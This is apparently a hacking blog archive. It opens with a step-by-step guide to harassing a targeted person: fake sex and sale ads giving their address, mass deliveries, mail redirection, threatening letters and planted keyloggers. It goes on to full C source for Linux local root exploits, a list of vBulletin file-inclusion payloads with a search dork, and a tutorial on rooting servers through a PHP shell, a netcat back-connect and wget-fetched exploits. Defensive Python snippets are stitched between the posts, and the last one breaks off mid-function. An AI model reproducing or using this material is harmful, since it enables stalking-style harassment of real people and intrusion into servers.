Category Archives: Hacking

How to RUIN somebodies life[Cyber Killing]

Firstly, I would like to let everybody know that the techniques I am about to teach are potentially dangerous. Whether you choose to use them or not is up to you and I am NOTliable for any shit you get into. 

Secondly, If you would like to use most of these techniques I would consider getting a VPN or a Proxy. You can get a free VPN here..

It isn’t as good as a legit logless VPN but it is better than nothing.
http://proxpn.com/download.php

You will also need to put a RAT or Keylogger on their computer to gain the information you need in most circumstances.

 

Okay.. lets begin!

 

Method 1 – Unemployment sucks

With their information in hand create a good resume. Good but still believable. Send this resume to all of the jobs in his/her local area and word will quickly spread that this person is of low company. Word of pranks like this will really get around.

Method 2 – Crazy orgy in the house!

Don’t you hate it when creepy people knock at your door? Well try about twenty or more thinking they are going to have a good time! 
There are multiple websites for odd balls and creeps to get together for some anonymous hanky spanky. You can find things like this on Craigslist, which is where you will have the best luck for advertising your orgy. 
Simply post a few pictures of a sex room you find off of Google, a picture of the slave and the address. The best time for this would be a Saturday night. Make sure the slave is home for this.

Method 3 – Who wants Chinese?

Oh, one of the most classic get back pranks ever! However, You aren’t in it just to prank this guy.. you are here to PLAGUE him. 
Simply order out from all delivery restaurants in the area. Make sure the order is believable. You could easily have 25 different delivery guys coming to his door within the hour. 

Method 4 – Hell by boxes

This is one of the most infamous of methods to mess with somebody.
Essentially what you do is you order free boxes for your slave. Postal companies will send you free boxes.. You could easily get a few thousand of these boxes sent to the victims house. Littering his front lawn, it will piss off the neighbors and it is possible he could be nabbed for fraud.

Step 1 – Create a USPS.com account using a valid email. sites such as http://www.mailinator.com can be used for this. It provides e-mail addresses without signing up.
Step 2: Go to USPS’s store section and order all the free boxes and mailing envelopes you can.
Step 3: Confirm the address and purchase the boxes.

If I remember correctly you can order up to 25 free packs on a single account. So if you do this correctly, One account can be used to send 500+ boxes. You can make multiple accounts, sending thousands of boxes.. It will be like Boxes from hell!

Method 5 – You got mail! A lot of mail!

Who said email is the only way? Lets see how we can ruin his/her life with real mail!

Scare him! – Send truly disturbing images in envelopes, Write In blood red ink. Maybe draw a picture you could imagine a psychopath would, really make this guy quiver. 

Making him believe he doesn’t have any bills anymore! – Go to the local USPS office and tell them that you are moving, or you are new to the area and need to redirect your mail temporally. You will then receive an envelope to fill out and drop in any mailbox. There is no checking done by USPS on this. Redirect mail from P.O. Boxes and rural and carrier routes as well. 

Method 6 – Yard sale! “Flat screen TV! $50!!!”

Now, if you read this.. would it excite you? I’m sure it would REALLY excite a lot of people. Hit up Craigslist and other classifieds stating you are selling a lot of high end stuff, really cheap. You will get many many people coming up the the victims door looking for cheap stuff. Even the cops get involved sometimes because they suspect he stole it all. LOL

Method 7 – Being single sucks

There is nothing better than watching the person you hate become lonely and desperate. If he lives with his wife/girlfriend, call.. if she answers quickly hang up. Send used panties and love letters through the mail. This will DEFINITELY raise suspicion. Be creative on this one.

Method 8 – Complete overkill

This is by far the most rewarding, insane and satisfying method of making your target absolutely crazy. 

First off, You will need to have Yellowpages from the targets area. You can be creative and do a general online search for businesses in the area.
Go from A-Z calling up local businesses (Mask your number), Asking for quotes and services, Arrange meetings at the victims address. Everybody from construction teams, to landscapers to carpentry estimates to exterminators will be at the targets house. Make sure you schedule out these meetings ahead of time and all within an hour or so of each other. You can be willing to bet this will cause quite a stir. 

You can go as far as hire labor teams, promising $20 an hour for general labor. You can be willing to bet angry, unemployed men will not think this is funny AT ALL. 

If you want to catch everything on tape, simply call local news stations and tell them there will be something big happening that morning around the time you scheduled the businesses to show up.

best case scenario.. The target gets beat up, yelled at, humiliated on national television, put in jail and fined.

How to crack MD5 hashes

In case you did not already know, MD5 is a hash function, not encryption, so a hash cannot be decrypted; it can only be cracked by hashing guesses until one matches.

First off, download “Password Pro” from here.
It comes as a zip file, so I suggest installing 7zip.
Extract all of the files into one folder.
It should look similar to this.

For the purpose of this tutorial, I will be cracking this hash: “6dcd0f272fbb7f6f8ff3a8a5e96c45aa:Ws)”, which is formatted as “Hash:Salt”, and is from VBulletin 4.x.x.

Open up notepad, paste in the Hash and salt, and save it anywhere on your computer, preferably in the same folder as Password Pro.

Open up Password Pro and go to “File->Import”

Find the place where you saved the text file with the hash inside of it, and open it.
Fill in the boxes as such.

Note: The bottom box is the format of the hash and salt in the text file, and the top box is the algorithm for vBulletin 4.x. Different hash types use different algorithms; check the list of algorithms for other hash types here.

Now, go to “Audit->Preliminary Attack”
(For this hash, as it is simple, it should probably crack it with just this.)

Hit the start button, and watch it go.

If the Preliminary Attack does not work, repeat the previous steps with a Rainbow Attack (if you have a rainbow table), a Simple Dictionary Attack, or a Brute Force Attack.
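The tutorial's point, that a hash cannot be decrypted and is only cracked by guessing, is exactly what makes the scheme behind this “Hash:Salt” layout weak: vBulletin 3/4 stores md5(md5(password) + salt), two fast unkeyed MD5 rounds. The following Python is an added example, not part of the original post and not Password Pro's code; it verifies a record in that layout, measures how cheap one guess is, and shows the defender's usual fix, re-hashing each legacy record with PBKDF2-HMAC-SHA256 the next time its owner logs in. The salt, the password and the `pbkdf2_sha256$…` record format are constructed for the example.

```python
import hashlib
import hmac
import os
import time
from typing import Optional, Tuple

# Work factor for the replacement scheme (PBKDF2-HMAC-SHA256); a constructed
# choice in the range current guidance recommends.
PBKDF2_ITERATIONS = 600_000


def vb4_hash(password: str, salt: str) -> str:
    """Legacy vBulletin 3/4 scheme: md5(md5(password) + salt), hex encoded.
    Fast for the server, and therefore equally fast for anyone guessing
    passwords against a leaked record."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


def verify_vb4(password: str, record: str) -> bool:
    """`record` is 'hash:salt', the layout the tutorial pastes into notepad."""
    stored, salt = record.split(":", 1)
    return hmac.compare_digest(vb4_hash(password, salt), stored)


def pbkdf2_hash(password: str, salt: Optional[bytes] = None,
                iterations: int = PBKDF2_ITERATIONS) -> str:
    """Replacement record (constructed layout): 'pbkdf2_sha256$iter$salthex$dkhex'."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password: str, record: str) -> bool:
    algo, iterations, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def login_and_upgrade(password: str, record: str) -> Tuple[bool, str]:
    """Accept either record format. A successful login against a legacy record
    returns a fresh PBKDF2 record for the caller to store in place of the old
    one; this migrates hashes without the site ever knowing the passwords."""
    if record.startswith("pbkdf2_sha256$"):
        return verify_pbkdf2(password, record), record
    if verify_vb4(password, record):
        return True, pbkdf2_hash(password)
    return False, record


def guesses_per_second(hasher, seconds: float = 0.5) -> float:
    """Rough single-thread guess rate for `hasher`: shows why the legacy scheme
    is 'crackable' while the PBKDF2 one is merely slow for the attacker too."""
    n, deadline = 0, time.perf_counter() + seconds
    while time.perf_counter() < deadline:
        hasher(f"guess{n}")
        n += 1
    return n / seconds


if __name__ == "__main__":
    # Constructed record in the tutorial's 'hash:salt' layout, not a real user.
    record = f"{vb4_hash('correct horse', 'Ws)')}:Ws)"
    ok, new_record = login_and_upgrade("correct horse", record)
    print("legacy login ok:", ok, "-> upgraded record:", new_record[:40] + "...")
    print("md5(md5()) guesses/s:", int(guesses_per_second(lambda p: vb4_hash(p, "Ws)"))))
    print("pbkdf2 guesses/s:", guesses_per_second(lambda p: pbkdf2_hash(p, b"\0" * 16), seconds=2))
```

The upgrade-on-login pattern is the practical remedy for a database full of these records: every legacy hash that is still unverified after the migration window is a dormant, fast-to-guess credential and should be force-reset.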

Hope you guys liked it; be sure to check back for more tuts and hacks.

Linux Kernel 2.6.13 Local root Exploit

Here is another local exploit for Linux kernel version 2.6.13.

/*
#####################################################
# Title: Linux Kernel 2.6.13 Local root Exploit     #
# Author: Angel Injection                           #
# Home: http://1337day.com                          #
# Thanks To: Inj3ct0r Team                          #
#####################################################
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <linux/a.out.h>
#include <asm/unistd.h>

static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;

/*              shell code		*/
__asm__ ("	__excode:	call	1f			\n"
	 "	1:		mov	$23, %eax		\n"
	 "			xor	%ebx, %ebx		\n"
	 "			int	$0x80			\n"
	 "			pop	%eax			\n"
	 "			mov	$cmd-1b, %ebx		\n"
	 "			add	%eax, %ebx		\n"
	 "			mov	$arg-1b, %ecx		\n"
	 "			add	%eax, %ecx		\n"
	 "			mov	%ebx, (%ecx)		\n"
	 "			mov	%ecx, %edx		\n"
	 "			add	$4, %edx		\n"
	 "			mov	$11, %eax		\n"
	 "			int	$0x80			\n"
	 "			mov	$1, %eax		\n"
	 "			int	$0x80			\n"
	 "	arg:		.quad	0x00, 0x00		\n"
	 "	cmd:		.string		\"/bin/sh\"	\n"
	 "	__excode_e:	nop				\n"
	 "	.global		__excode			\n"
	 "	.global		__excode_e			\n"
	);

extern void (*__excode) (void);
extern void (*__excode_e) (void);

void
error (char *err)
{
  perror (err);
  fflush (stderr);
  exit (1);
}

/*	exploit this shit	*/
void
exploit (char *file)
{
  int i, fd;
  void *p;
  struct stat st;

  printf ("\ntrying to exploit %s\n\n", file);
  fflush (stdout);
  chmod ("/proc/self/environ", 04755);
  c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
  memset ((void *) c, 0, 4096);

  /*      slow down machine       */
  fd = open (file, O_RDONLY);
  fstat (fd, &st);
  p =
    (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
  if (p == MAP_FAILED)
    error ("mmap");
  prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
  sprintf (t, "/proc/%d/environ", getpid ());
  sched_yield ();
  execve (NULL, a, e);
  madvise (0, 0, MADV_WILLNEED);
  i = fork ();

  /*      give it a try           */
  if (i)
    {
      (*c)++;
      !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
      prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
      sched_yield ();
    }
  else
    {
	    nice(10);
	    while (!(*c));
		sched_yield ();
      execve (t, a, e);
      error ("failed");
    }

  waitpid (i, NULL, 0);
  exit (0);
}

int
main (int ac, char **av)
{
  int i, j, k, s;
  char *p;

  memset (e, 0, sizeof (e));
  memset (a, 0, sizeof (a));
  a[0] = strdup (av[0]);
  a[1] = strdup (av[0]);
  a[2] = strdup (av[1]);

  if (ac < 2)
    error ("usage: binary <big file name>");
  if (ac > 2)
    exploit (av[2]);
  printf ("\npreparing");
  fflush (stdout);

  /*      make setuid a.out       */
  memset (&ex, 0, sizeof (ex));
  N_SET_MAGIC (ex, NMAGIC);
  N_SET_MACHTYPE (ex, M_386);
  s = ((unsigned) &__excode_e) - (unsigned) &__excode;
  ex.a_text = s;
  ex.a_syms = -(s + sizeof (ex));

  memset (b, 0, sizeof (b));
  memcpy (b, &ex, sizeof (ex));
  memcpy (b + sizeof (ex), &__excode, s);

  /*      make environment        */
  p = b;
  s += sizeof (ex);
  j = 0;
  for (i = k = 0; i < s; i++)
    {
      if (!p[i])
	{
	  e[j++] = &p[k];
	  k = i + 1;
	}
    }

  /*      reexec                  */
  getcwd (t, sizeof (t));
  strcat (t, "/");
  strcat (t, av[0]);
  execve (t, a, e);
  error ("execve");
  return 0;
}

source : http://1337day.com/exploits/17146 

Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit

This is another exploit, found by the 1337 team, for 2010-era servers. I have already explained what rooting is; do use this exploit in your hacks.

/*
 * Tested on Linux 2.6.32.1 | Linux 2.6.33.2 | 2.6.32-24-generic | 2.6.37 (2010)
* Result;
* # id
* uid=0(root) gid=0(root)
*
* 3xPl017 F0r x86_64 L1nuX k3rn3L ia32syscall 3muLatL47i0N (again) > x86_64 2.6.27+ ( not for 2.6.27 and below ! )
*
* If y0u g37 3Rr0R > ./1337
* symbol table not available, aborting!
* Process finished < O_o
* C4usE 3xpl017 Re4dS “/proc/kallsyms” | “/proc/ksyms” , iF n07 4va1bl3! iT g1ve5 ErRoR O_o
*
* Upgrade the kernel ksplice without Reboo7, and the vulneRabiLitY is gonE !
*
* Greetz: r0073r(1337day.com) ,r4dc0re ,Sid3^effects | & all members of r00tw0rm.com !
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <termios.h>
#include <linux/serial.h>

#define DEVICE "/dev/ttyS1"

int main(int argc, char* argv[]) {
    int ret = 0;
    int i, fd, reservedsize;
    char* buf;
    struct  serial_multiport_struct  buffer;
    printf("[\\m/] Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit\n");
    printf("[\\m/] by Todor Donev\n");
    fd = open(DEVICE, O_RDONLY);
    if (fd <0) {
    printf("[-] Error: f0k\n");
    exit(-1);
}
    if (argc < 2) {
        fprintf(stderr, "[!] usg: %s <leakfile> <reservedsize>\n", argv[0]);
        exit(-1);
    }
    if (argc > 2)
        if ((reservedsize = atoi(argv[2])) == 0) {
            fprintf(stderr, " [-] Sorry: (atoi) invalid outsize\n");
            exit(-1);
        }
    fprintf(stderr, "  [x] Leakfile: %s\n", argv[1]);
    fprintf(stderr, "  [x] Reservedsize: %u\n", reservedsize);
     if ((buf = (char *)malloc(reservedsize)) == NULL) {
        perror("Sorry: (malloc)");
        fprintf(stderr, " [-] Sorry: Try again with other output size\n");
        exit(1);
    }
    memset(&buffer,0,sizeof(buffer));
    printf("[+] Leaking.. =)\n");
    if((fd = open(argv[1], O_RDWR | O_CREAT, 0640)) == -1){
    printf("[-] Error: f0k =(\n");
    exit(-1);
    }
    for(i=0;i<=reservedsize;i++){
        ret += write(fd,&buffer.reserved[i],sizeof(int));
    }
    close(fd);
    printf("\\o/ %d bytez\n",ret);
    exit(0);
}

SOURCE : http://1337day.com/exploits/14940
Hope you guys enjoy the exploit :D

vBulletin® Version 4.1.7 Beta 1 Multi Vulnerability [RFI]

Well, this is the RFI exploit for the vBulletin 4.1.7 vulnerability.

DORK : "POWERED BY vBulletin® Version 4.1.7 Beta 1"

Thanks to 1337day

====================================================
vBulletin® Version 4.1.7 Beta 1 Multi Vulnerability
====================================================

[1337day ASCII banner] Site : 1337day.com | Support e-mail : submit[at]inj3ct0r.com | Exploit database separated by exploit type (local, remote, DoS, etc.)

#######################################################

 # Vendor: noLogging by SCRiPTZSECTOR.ORG 

 # Date: 2011-07-27 

 # Author : indoushka 

 +++=[ Dz Offenders Cr3w ]=+++

 # KedAns-Dz * Caddy-Dz * Kalashinkov3

 # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz 

 # Contact : ind0ushka@hotmail.com

 # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr

######################################################################## 

# Exploit By indoushka
-------------

Powered by vBulletin® Version 4.1.7 Beta 1

RFI :
Function: include File: api.php Line: 139
Exploit: http://localhost/vB1/api.php?api_script=[EV!L]

##################################################

Function: require_once File: payment_gateway.php Line: 3
Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L]

##################################################

Function: include_once File: cronadmin.php Line: 4
Exploit: http://localhost/vB1/admincp/cronadmin.php?nextitem[filename]=[EV!L]

##################################################

Function: include File: diagnostic.php Line: 12
Exploit: http://localhost/vB1/admincp/diagnostic.php?match[0]=[EV!L]

##################################################

Function: require_once File: diagnostic.php Line: 18
Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L]

##################################################

Function: include_once File: plugin.php Line: 22
Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L]

##################################################

Function: include_once File: class_block.php Line: 14
Exploit: http://localhost/vB1/includes/class_block.php?file=[EV!L]

##################################################

Function: require_once File: class_humanverify.php Line: 2
Exploit: http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L]

##################################################

Function: require_once File: class_paid_subscription.php Line: 24
Exploit: http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L]

##################################################

Function: require_once File: functions.php Line: 6
Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L]

##################################################

Function: include_once File: functions_cron.php Line: 8
Exploit: http://localhost/vB1/includes/functions_cron.php?nextitem[filename]=[EV!L]

##################################################

Function: require File: vb.php Line: 7
Exploit: http://localhost/vB1/vb/vb.php?filename=[EV!L]

##################################################

Function: require_once File: class_upgrade.php Line: 48
Exploit: http://localhost/vB1/install/includes/class_upgrade.php?chosenlib=[EV!L]

##################################################

Function: include_once File: attach.php Line: 80
Exploit: http://localhost/vB1/packages/vbattach/attach.php?package=[EV!L]

##################################################

Function: include_once File: attach.php Line: 604
Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]

##################################################

Function: include_once File: attach.php Line: 1222
Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]

##################################################

Directory Listing ckeditor :

http://localhost/vB1/clientscript/ckeditor/
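Every entry in the advisory above has the same shape: a script, the include-type call, and the request parameter whose value reaches it. The following Python is an added example, not from the advisory, 1337day or vBulletin; it turns that list into a detection rule over web server access logs, flagging requests where one of those parameters carries a URL or a PHP stream wrapper instead of a local script name, including values that were double percent-encoded. The log lines, client addresses and the `attacker.invalid` host are constructed.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl, unquote, urlsplit

# Script -> parameters that reach include()/require(), copied from the advisory above.
RFI_SINKS: Dict[str, set] = {
    "api.php": {"api_script"},
    "payment_gateway.php": {"api[classname]"},
    "admincp/cronadmin.php": {"nextitem[filename]"},
    "admincp/diagnostic.php": {"match[0]", "api[classname]"},
    "admincp/plugin.php": {"safeid"},
    "includes/class_block.php": {"file"},
    "includes/class_humanverify.php": {"chosenlib"},
    "includes/class_paid_subscription.php": {"methodinfo[classname]"},
    "includes/functions.php": {"classfile"},
    "includes/functions_cron.php": {"nextitem[filename]"},
    "vb/vb.php": {"filename"},
    "install/includes/class_upgrade.php": {"chosenlib"},
    "packages/vbattach/attach.php": {"package", "path"},
}

# A value naming a remote resource or a PHP stream wrapper rather than a local script.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?|php|data|phar|expect)\s*:", re.IGNORECASE)
# Combined log format: client address first, request line in quotes.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')


def sinks_for(path: str) -> set:
    """Parameters to watch for the script at `path`, or an empty set."""
    return {p for script, params in RFI_SINKS.items()
            if path.endswith("/" + script) for p in params}


def rfi_findings(line: str) -> List[dict]:
    m = REQUEST_RE.match(line)
    if not m:
        return []
    client, target = m.group(1), m.group(2)
    parts = urlsplit(target)
    watched = sinks_for(parts.path)
    if not watched:
        return []
    findings = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)  # second decode round catches double-encoded values
        if key in watched and REMOTE_VALUE.match(value):
            findings.append({"client": client, "script": parts.path,
                             "param": key, "value": value})
    return findings


def scan_log(lines) -> List[dict]:
    return [f for line in lines for f in rfi_findings(line)]


# Constructed log lines; attacker.invalid is a reserved name that never resolves.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Jul/2011:10:00:01 +0000] "GET /vB1/api.php?api_script=http://attacker.invalid/s.txt HTTP/1.1" 200 512',
    '10.0.0.6 - - [27/Jul/2011:10:00:02 +0000] "GET /vB1/api.php?api_script=forum HTTP/1.1" 200 512',
    '10.0.0.7 - - [27/Jul/2011:10:00:03 +0000] "GET /vB1/install/includes/class_upgrade.php?chosenlib=%2568%2574%2574%2570%253a%252f%252fattacker.invalid/x HTTP/1.1" 200 88',
    '10.0.0.8 - - [27/Jul/2011:10:00:04 +0000] "GET /vB1/payment_gateway.php?api%5Bclassname%5D=php://input HTTP/1.1" 500 0',
    '10.0.0.9 - - [27/Jul/2011:10:00:05 +0000] "GET /vB1/forum.php?t=42 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The rule keys on the parameter names the advisory lists, so it is specific to this product; the generic version of the same check (any parameter whose value starts with a URL scheme or stream wrapper) is noisier but catches sinks the advisory does not enumerate.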

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
---------------------------------------------------------------------------------------------------------------------------------

ROOTING (FULL TUTORIAL)

Rooting Full Tutorial
This is a tutorial on something that is not often discussed.
What do we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains and luck.


First of all, we need to get a shell on a site.
For this tutorial I will be using the c100 or r57 shell.

So, once you have it on a site, go to the ‘Backdoor Host’ tab and forward a port.

Now, go to the ‘Back Connect’ tab and insert the following settings:

1- Your IP Address.
2-The port you forwarded.

Now, open CMD and type: cd ‘Path To Your Netcat.exe’. Then you need to make netcat listen on the port you forwarded. To do this, type: nc -l -n -v -p port

It looked like this for me:

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\FeAR>cd C:\

C:\>cd WINDOWS

C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 8080 …

Now, when you have netcat listening to the port you forwarded, click ‘Connect’.

When you're connected, type ‘whoami’. You shouldn't have root.

Now, to find an exploit to root the box, you need to know the kernel version. To do this, just type ‘uname -a’.

It should look something like this:

Code:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686

Now, we go to exploit-db.com and look for ‘2.6.17’.

Code:
http://www.exploit-db.com/exploits/5092/

Now, we type ‘wget’ followed by the URL of the Linux Kernel 2.6.17 – 2.6.24.1 vmsplice Local Root Exploit in the netcat window.

Code:
wget http://xpl_url.com

For the exploit to work, you must compile it on the server (gcc) and write the output to a file (-o).

To do this we type ‘gcc 5092 -o exploit’.

Code:
gcc 5092 -o exploit

5092 - the file name after the URL path, e.g. http://www.site.com/5092.
exploit - the output name.

Now you can execute your exploit by typing ‘./exploit’.

Wait for the exploit to finish running and type ‘whoami’ again.

It should output something like this:

Code:
uid=0(root) gid=0(root) groups=500(apache)

This means you have successfully rooted the box.
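The kernel-version step above is also how a defender triages a server: take the `uname -a` line, strip the vendor suffix, and compare the upstream version against the affected range the tutorial quotes (2.6.17 to 2.6.24.1 for the vmsplice exploit, exploit-db 5092). The following Python is an added example, not from the original tutorial; the `AFFECTED_RANGES` table is constructed with that single entry, and `has_vendor_suffix` carries the caveat that matters in practice: distribution kernels such as the `el5` build in the sample backport fixes without changing the version number, so a version match is a reason to check the vendor advisory, not proof of exposure.

```python
import re
from typing import List, Optional, Tuple

# Constructed table with one entry, taken from the tutorial text above:
# "Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit" (exploit-db 5092).
AFFECTED_RANGES = [
    ("vmsplice local root (exploit-db 5092)", (2, 6, 17), (2, 6, 24, 1)),
]

# `uname -a` prints: Linux <hostname> <release> <version string ...>
UNAME_RE = re.compile(r"^Linux\s+\S+\s+(\d+(?:\.\d+)+)")


def parse_kernel_version(uname_line: str) -> Optional[Tuple[int, ...]]:
    """Upstream version tuple from a `uname -a` line. The distro suffix after
    '-' (e.g. '-92.1.10.el5PAE') is dropped; it is not upstream numbering."""
    m = UNAME_RE.match(uname_line.strip())
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def has_vendor_suffix(uname_line: str) -> bool:
    """A '-' right after the version marks a vendor build, which may carry
    backported fixes the bare version number does not reveal."""
    line = uname_line.strip()
    m = UNAME_RE.match(line)
    return bool(m) and line[m.end():m.end() + 1] == "-"


def affected_by(uname_line: str) -> List[str]:
    """Names of the ranges the upstream version falls into (inclusive bounds).
    Tuple comparison handles 2.6.24 < 2.6.24.1 < 2.6.24.2 correctly."""
    version = parse_kernel_version(uname_line)
    if version is None:
        return []
    return [name for name, low, high in AFFECTED_RANGES if low <= version <= high]


def triage(uname_line: str) -> str:
    hits = affected_by(uname_line)
    if not hits:
        return "version outside known affected ranges"
    note = ("; vendor build, confirm against distro advisories"
            if has_vendor_suffix(uname_line) else "")
    return "in range for: " + ", ".join(hits) + note


if __name__ == "__main__":
    # The sample `uname -a` line from the tutorial above.
    sample = ("Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE "
              "#1 SMP Tue Aug 5 08:14:05 EDT 2008 i686")
    print(parse_kernel_version(sample), "->", triage(sample))
```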

There are more ways to do this, this is the way I usually do it. 

There are public exploits for some servers (2009 and 2010 kernels), but for 2011 and some 2010 servers the exploits are private. I will explain how to hack those using symlinks in the next tutorial.

CYA 

Directory Traversal Tutorial

Directory Traversal

HTTP exploits use the Web server software to perform malicious activities. Directory traversal is one such exploit which lets attackers access restricted directories, execute commands and view data outside the normal Web server directory where the application content is stored.

http://en.wikipedia.org/wiki/Directory_traversal

Detailed Description

Attackers use directory traversal attacks to try to access restricted Web server files residing outside of the Web server’s root directory.

The basic role of Web servers is to serve files. Files can be static, such as image and HTML files, or dynamic, such as ASP and JSP files. When the browser requests a dynamic file, the Web server first executes the file and then returns the result to the browser. Hence, dynamic files are actually files executed on the Web server.

To prevent users from accessing unauthorized files on the Web server, Web servers provide two main security mechanisms: the root directory and access control lists. The root directory limits users’ access to a specific directory in the Web server’s file system. All files placed in the root directory and in its sub-directories are accessible to users. To limit users’ access to specific files within the root directory, administrators use access control lists. Using access control lists, administrators can determine whether a file can be viewed or executed by users, as well as other access rights.

The root directory prevents attackers from executing files such as cmd.exe on Windows platforms or accessing sensitive files such as the “passwd” password file on Unix platforms, as these files reside outside of the root directory. The Web server is responsible for enforcing the root directory restriction.

By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute powerful commands on the Web server, leading to a full compromise of the Web server.

A directory traversal vulnerability can exist either in the commercial Web server itself or in the Web application code executed on the Web server. In the case of Web application code, dynamic pages usually receive input from browsers. Here is an example of such an HTTP request:

http://www.acme-hackme.com/online/getnews.asp?item=20March2003.html

In this example, the dynamic page requested by the browser is called getnews.asp and the browser sends the Web server the parameter item with a value of 20March2003.html. When executed by the Web server, getnews.asp retrieves the file 20March2003.html from the Web server’s file system, renders it and sends it back to the browser which presents it to the user. A skilled attacker will immediately identify the potential problem in this request as the value of the parameter ends with a file extension, in this case “html”. The attacker will then assume that the dynamic page retrieves the file from the file system and uses it. By sending the following URL to the Web server:

http://www.acme-hackme.com/online/getnews.asp?item=../../../../WINNT/win.ini

the attacker causes getnews.asp to retrieve the file ../../../../WINNT/win.ini from the file system and send it to the attacker’s browser. The term “../” stands for “one directory up”. This is a common operating system directive. Therefore, the string ../../../../WINNT/win.ini means “go four directories up and retrieve the file win.ini from there”. The attacker needs to guess how many directories to climb in order to get to the desired directory. (In this example the attacker tries to get to “C:\” and is assuming that the Web server’s root directory is located four directories below “C:\”). Guessing the exact combination is very easy. The attacker simply sends multiple requests until the desired result is achieved.

The directory traversal vulnerability occurs when programmers fail to validate input received from browsers. In the above example, the getnews.asp code does not validate that the value of the item parameter stays within the root directory. The directory traversal vulnerability thus bypasses the Web server’s root directory restriction by passing crafted input through the application code running on the Web server.

Web applications are not the only source of directory traversal vulnerabilities in your Web site. Some vulnerabilities exist within the Web server. These vulnerabilities can be part of sample files (e.g., sample ASP files) that exist on the Web server, or can be incorporated into the Web server software. For example, some earlier versions of the Microsoft IIS Web server included directory traversal vulnerabilities that allow attackers to fully compromise the Web server by executing files on the server. For example, the following URL:

http://www.acme-hackme.com/scripts/..%5c../winnt/system32/cmd.exe?/c+dir+c:\

would execute the cmd.exe file (the operating system shell) and run the “dir c:\” command, which lists all files in the C:\ directory. Notice the string “%5c” that appears in the URL. This is a URL escape code. Escape codes represent characters in the form %nn, where nn is the character’s two-digit hexadecimal value; the escape code “%5c” represents the character “\”. The problem is that the IIS root directory check did not decode escape codes before testing the path, so it allowed that request through; the operating system did decode them and executed the command.

Escape codes are also very useful for bypassing poorly written filters enforced on input received from users. If the filter looks for “../”, then the attacker could easily change the input to “%2e%2e/”. This has the same meaning as “../”, but is not detected by the filter. The escape code %2e represents the character “.” (dot).
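The two filter bypasses described above (`%2e%2e/` for `../`, and `%5c` for `\`) both fail against code that decodes first, normalises second, and only then compares the resolved path with the document root. The following Python is an added example, not part of the original text, showing that pattern next to the naive `../` filter the text criticises; the document root `/var/www/online/news` is constructed, and the `item` values are the requests discussed above plus a double-encoded and a NUL-byte variant.

```python
import posixpath
from urllib.parse import unquote


class TraversalAttempt(ValueError):
    """Raised when a browser-supplied file name would leave the document root."""


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so that '%2e%2e/' and
    the double-encoded '%252e%252e/' both become '../' before any check."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def naive_filter_blocks(user_path: str) -> bool:
    """The poorly written filter the text describes: it looks for '../' only,
    so an encoded '%2e%2e/' walks straight past it."""
    return "../" in user_path


def resolve_under_root(root: str, user_path: str) -> str:
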